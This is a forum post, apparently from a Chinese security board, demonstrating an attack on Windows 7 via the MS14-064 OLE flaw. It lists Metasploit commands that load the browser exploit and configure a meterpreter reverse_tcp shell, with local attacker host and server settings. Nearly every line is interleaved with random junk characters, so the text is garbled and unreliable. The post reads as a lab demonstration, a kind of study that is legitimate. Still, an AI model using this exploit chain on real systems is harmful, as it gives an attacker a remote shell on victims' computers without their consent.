找回密码
 立即注册
查看: 2631|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 w7 A- O% R% ?' ~; y5 F 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示3 e& s% c. v& U/ x6 G" @2 Q8 x2 |

1 i/ T6 C( S* Q" m& [

; ]5 v( L8 w$ @( } 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 7 _9 O- r& W6 M6 A! i& N* `

, W0 M2 l- u, y* ?( a. F& j P

/ j/ ? F7 R0 q# N 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp & m) R4 j P( [% K% ^7 r1 k

# k5 H7 ]6 H; T# y

- `: R- d+ C( Y4 z& m, g' p3 r. U+ l             set AllowPowershellPrompt true / D q) a$ M1 Y/ u; o4 G+ ?

7 R2 [* _# \9 N. Q+ u' V b

. V7 u8 q( _1 ]5 ~             Set LHOST 192.168.0.109 3 I9 E- g" k$ Y6 V4 Z7 U& P

4 K* v/ @5 `* p

+ K8 W. P% `6 c- ]/ m5 G3 a4 K& Y9 D             set SRVHOST 192.168.0.1090 h3 \: d7 z( O: c, l7 s

- [3 i) C. ~3 A9 }+ h

. q2 L* z9 Y6 d1 \             Set uripath share( v" ~6 Z/ B# @9 N

4 t+ D4 s n; l6 [7 p p

' f/ n* c1 `' \( ]& t8 d2 q. X \7 Y, e             Set srvport 80 % O& Y3 F) y( Y0 q6 p. T6 l

0 v5 T0 m* O1 r8 P

" c) Z1 v+ W/ r) j& P   # S( i! R# X8 w6 i$ l

& O% N/ t @# {2 F4 z6 d( X

- i5 |7 R: ?) v6 ^3 f: E8 o  7 _, U% l; p. X

7 e9 @* X% ]) u4 J# r

5 x2 q0 n; d9 W9 {4 j   : O- w! E3 m$ o" T( o

. N) {7 i2 ~& n6 i# K/ ?, O5 y

: X0 e; S8 h! l3 ~1 b/ U  - X0 X {) B/ S3 L8 O

" l7 |$ e: H" S$ E l5 y7 G* D

- Y* d* c) t( `$ r  + i* r3 R8 j( l0 G% B G

3 W7 ]: @+ Z* p& @* b& H

/ s# g7 P$ b; K) I 下面我们来访问本地地址如图:* V& V1 ` k& u6 x. J) w# C$ ?

/ o) h; H- K# M5 M

% f0 G; a* A% u" E; U% F9 q( V   - ~% G5 \, h3 A3 m- P7 ]* ~

9 U' _3 X7 i6 n" R7 A( F G. R% B9 x

2 s5 A, q, C% |   $ b+ h- i) A; f) p; G, m

* M, Y& ~) i" b+ Z! `- D

/ q0 z& ~% z* }$ A 0 R6 k0 I$ {9 G( Z; }

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表